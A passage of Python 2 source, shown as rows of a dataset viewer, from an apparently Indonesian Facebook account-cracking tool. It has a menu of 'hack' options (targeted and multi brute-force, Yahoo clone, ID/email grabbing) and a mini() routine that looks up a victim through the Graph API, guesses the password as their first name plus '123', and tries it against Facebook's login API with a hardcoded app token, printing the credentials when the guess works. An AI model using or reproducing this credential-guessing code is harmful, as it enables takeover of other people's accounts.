text stringlengths 0 93.6k |
|---|
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada' |
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') |
menu() |
def menu_hack(): |
os.system('clear') |
try: |
toket = open('login.txt', 'r').read() |
except IOError: |
print '\x1b[1;91m[!] Token not found' |
os.system('rm -rf login.txt') |
time.sleep(0.01) |
login() |
os.system('clear') |
print logo |
print 52 * '\x1b[1;97m\xe2\x95\x90' |
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)' |
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook' |
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook' |
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)' |
print '║-> \x1b[1;37;40m5. Yahoo Clone' |
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP' |
print '║-> \x1b[1;31;40m0. Back' |
print '\x1b[1;37;40m║' |
hack_pilih() |
def hack_pilih(): |
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') |
if hack == '': |
print '\x1b[1;91m[!] Can\'t empty' |
hack_pilih() |
else: |
if hack == '1': |
mini() |
else: |
if hack == '2': |
crack() |
hasil() |
else: |
if hack == '3': |
super() |
else: |
if hack == '4': |
brute() |
else: |
if hack == '5': |
menu_yahoo() |
else: |
if hack == '6': |
grab() |
else: |
if hack == '0': |
menu() |
else: |
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found' |
hack_pilih() |
def mini(): |
os.system('clear') |
try: |
toket = open('login.txt', 'r').read() |
except IOError: |
print '\x1b[1;91m[!] Token not found' |
os.system('rm -rf login.txt') |
time.sleep(0.01) |
login() |
else: |
os.system('clear') |
print logo |
print 52 * '\x1b[1;97m\xe2\x95\x90' |
print '\x1b[1;91m[ INFO ] Target must be your friend !' |
try: |
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') |
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') |
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket) |
a = json.loads(r.text) |
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name'] |
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...') |
time.sleep(1) |
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...') |
time.sleep(1) |
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') |
print 52 * '\x1b[1;97m\xe2\x95\x90' |
pz1 = a['first_name'] + '123' |
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') |
y = json.load(data) |
if 'access_token' in y: |
print '\x1b[1;91m[+] \x1b[1;92mFounded.' |
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] |
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id |
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1 |
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') |
menu_hack() |
else: |
if 'www.facebook.com' in y['error_msg']: |
print '\x1b[1;91m[+] \x1b[1;92mFounded.' |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.